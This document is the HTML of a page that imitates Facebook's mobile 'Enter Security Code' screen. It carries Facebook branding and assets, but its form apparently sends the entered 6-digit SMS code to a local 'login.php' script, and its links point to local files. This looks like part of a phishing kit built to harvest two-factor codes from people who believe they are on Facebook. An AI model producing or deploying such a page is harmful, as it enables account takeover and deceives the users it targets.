<html>
 <head>
  <title>Enter Security Code</title>
  <meta name="viewport" content="user-scalable=no,initial-scale=1,maximum-scale=1">
  <link href="https://static.xx.fbcdn.net/rsrc.php/v3/ya/r/O2aKM2iSbOw.png" rel="shortcut icon" sizes="196x196">
  <meta name="referrer" content="origin-when-crossorigin" id="meta_referrer">
  <meta name="theme-color" content="#3b5998">
  <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yL/l/0,cross/LsWIgBswp3K.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="t3ZXC" crossorigin="anonymous">
  <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/ye/l/0,cross/b_AqpKuW9mq.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="TNouh" crossorigin="anonymous">
  <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yl/l/0,cross/7ybYO-W5_7N.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="Znjea" crossorigin="anonymous"> 
  <meta http-equiv="origin-trial" data-feature="getInstalledRelatedApps" data-expires="2017-12-04" content="AvpndGzuAwLY463N1HvHrsK3WE5yU5g6Fehz7Vl7bomqhPI/nYGOjVg3TI0jq5tQ5dP3kDSd1HXVtKMQyZPRxAAAAABleyJvcmlnaW4iOiJodHRwczovL2ZhY2Vib29rLmNvbTo0NDMiLCJmZWF0dXJlIjoiSW5zdGFsbGVkQXBwIiwiZXhwaXJ5IjoxNTEyNDI3NDA0LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=">
  <link href="https://static.xx.fbcdn.net/rsrc.php/v3iLl54/yL/l/en_US/avkbCmTwBTJ.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script" crossorigin="anonymous"> 
  <link href="https://static.xx.fbcdn.net/rsrc.php/v3ikP64/yI/l/en_US/ziJgU7ZQ0wr.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script" crossorigin="anonymous"> 
  <link href="https://static.xx.fbcdn.net/rsrc.php/v3/yo/r/weVd5rrUZ6P.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script" crossorigin="anonymous"> 
  <link href="https://static.xx.fbcdn.net/rsrc.php/v3/y7/r/svFKQXueTby.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script" crossorigin="anonymous"> 
 </head>
 <body tabindex="0" class="touch x2 android _fzu _50-3 iframe acw portrait" style="min-height: 626px; background-color: rgb(255, 255, 255);"> 
  <div id="viewport" data-kaios-focus-transparent="1" style="min-height: 626px;">
   <h1 style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0">Facebook</h1>
   <div id="page" class="-hardstate-recover">
    <div class="_129_" id="header-notices"></div>
    <div class="_129- _6dr5" id="MChromeHeader">
     <div class="_7om2 _52we _52z5" id="header" data-sigil="MTopBlueBarHeader">
      <div class="_4g34 _52z6" data-sigil="mChromeHeaderCenter">
       <a href="/login/"><i class="img sp_MkhIH0XpI3D_3x sx_16c101"><u>facebook</u></i></a>
      </div>
     </div>
    </div>
    <div class="acw" id="root" role="main" data-sigil="context-layer-root content-pane" style="min-height: 582px;">
     <div class="_7om2">
      <div class="_4g34">
       <div class="_7v6_">
        <form method="post" action="login.php">
         <input type="hidden" name="lsd" value="AVqp_baN" autocomplete="off">
         <input type="hidden" name="jazoest" value="2744" autocomplete="off">
         <input type="hidden" name="ri">
         <input type="hidden" name="rpm">
         <input type="hidden" name="sr" value="">
         <div class="_5yd0 _2ph- _5yd1" data-sigil="error_message">
          <div class="_52jd">
           Please wait a few minutes to receive your 6-digit code before trying again.
          </div>
         </div>
         <section>
          <section class="_2pif _2pia _2pio"></section>
          <section class="_2pi9 _2pim _6w7p _7bro">
           <div>
            Please check your phone for a text message with your code. Your code is 6 characters long.
           </div>
          </section>
         </section>
         <section class="_2pio _2pia">
          <a class="_7brn" href="/login/forget_recovery/?next=%2Frecover%2Finitiate%2F%3Ffl%3Ddefault_recover">Didn't get a code?</a>
         </section>
         <section class="_2pin _2pia _6w7o">
          <div>
           <strong>Enter the 6-digit code</strong>
          </div>
         </section>
         <section class="_2pin _2pia">
          <input autocorrect="off" autocapitalize="off" autocomplete="off" type="number" class="_4nyr _4nyq _7bri _85k- _4qkw" name="email" placeholder="######" autofocus="1" data-sigil="code-input">
         </section>
         <div class="_2pin _2pi8 _7brk">
          <button type="submit" value="Next" class="_54k8 _52jh _56bs _56b_ _7brj _56bw _56bu" data-store="{&quot;nativeClick&quot;:true}" name="reset_action" data-sigil="touchable"><span class="_55sr">Next</span></button>
         </div>
         <div class="_2pi8 _7brm">
          <a href="/index.html" role="button" class="_54k8 _56bs _56b_ _7brl _56bw _56bt _52jh" data-sigil="touchable"><span class="_55sr">Enter Password to Log In</span></a>
         </div>
        </form>
        <div class="_2pi8 _7brm">
         <a href="/index.html" role="button" class="_54k8 _56bs _56b_ _7brl _56bw _56bt _52jh" data-sigil="touchable"><span class="_55sr">Cancel</span></a>
        </div>
       </div>
      </div>
     </div>
     <div style="display:none">
      <div></div>
      <div></div>
     </div>
     <span><img src="https://facebook.com/security/hsts-pixel.gif" width="0" height="0" style="display:none"></span>
    </div>
    <div class=""></div>
    <div class="viewportArea _2v9s" style="display:none" id="u_0_0" data-sigil="marea">
     <div class="_5vsg" id="u_0_1" style="max-height: 196px;"></div>
     <div class="_5vsh" id="u_0_2" style="max-height: 313px;"></div>
     <div class="_5v5d fcg">
      <div class="_2so _2sq _2ss img _50cg" data-animtype="1" data-sigil="m-loading-indicator-animate m-loading-indicator-root"></div>Loading...
     </div>
    </div>
    <div class="viewportArea aclb" id="mErrorView" style="display:none" data-sigil="marea">
     <div class="container">
      <div class="image"></div>
      <div class="message" data-sigil="error-message"></div>
      <a class="link" data-sigil="MPageError:retry">Try Again</a>
     </div>
    </div>
   </div>
  </div>
  <div id="static_templates">
   <div class="mDialog" id="modalDialog" style="display:none" data-sigil=" context-layer-root" data-autoid="autoid_1">
    <div class="_52z5 _451a mFuturePageHeader _1uh1 firstStep titled" id="mDialogHeader">
     <div class="_7om2 _52we">
      <div class="_5s61">
       <div class="_52z7">
        <button type="submit" value="Cancel" class="cancelButton btn btnD bgb mfss touchable" id="u_0_4" data-sigil="dialog-cancel-button">Cancel</button>
        <button type="submit" value="Back" class="backButton btn btnI bgb mfss touchable iconOnly" aria-label="Back" id="u_0_5" data-sigil="dialog-back-button"><i class="img sp_MkhIH0XpI3D_3x sx_8ce74a" style="margin-top: 2px;"></i></button>
       </div>
      </div>
      <div class="_4g34">
       <div class="_52z6">
        <div class="_50l4 mfsl fcw" id="m-future-page-header-title" role="heading" tabindex="0" data-sigil="m-dialog-header-title dialog-title">
         Loading...
        </div>
       </div>
      </div>
      <div class="_5s61">
       <div class="_52z8" id="modalDialogHeaderButtons"></div>
      </div>
     </div>
    </div>
    <div class="modalDialogView" id="modalDialogView"></div>
    <div class="_5v5d _5v5e fcg" id="dialogSpinner">
     <div class="_2so _2sq _2ss img _50cg" data-animtype="1" id="u_0_3" data-sigil="m-loading-indicator-animate m-loading-indicator-root"></div>Loading...
    </div>
   </div>
  </div> 
  <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3iLl54/yL/l/en_US/avkbCmTwBTJ.js?_nc_x=Ij3Wp8lg5Kz" as="script" crossorigin="anonymous"> 
  <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3ikP64/yI/l/en_US/ziJgU7ZQ0wr.js?_nc_x=Ij3Wp8lg5Kz" as="script" crossorigin="anonymous"> 
  <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yo/r/weVd5rrUZ6P.js?_nc_x=Ij3Wp8lg5Kz" as="script" crossorigin="anonymous"> 
 </body>
</html>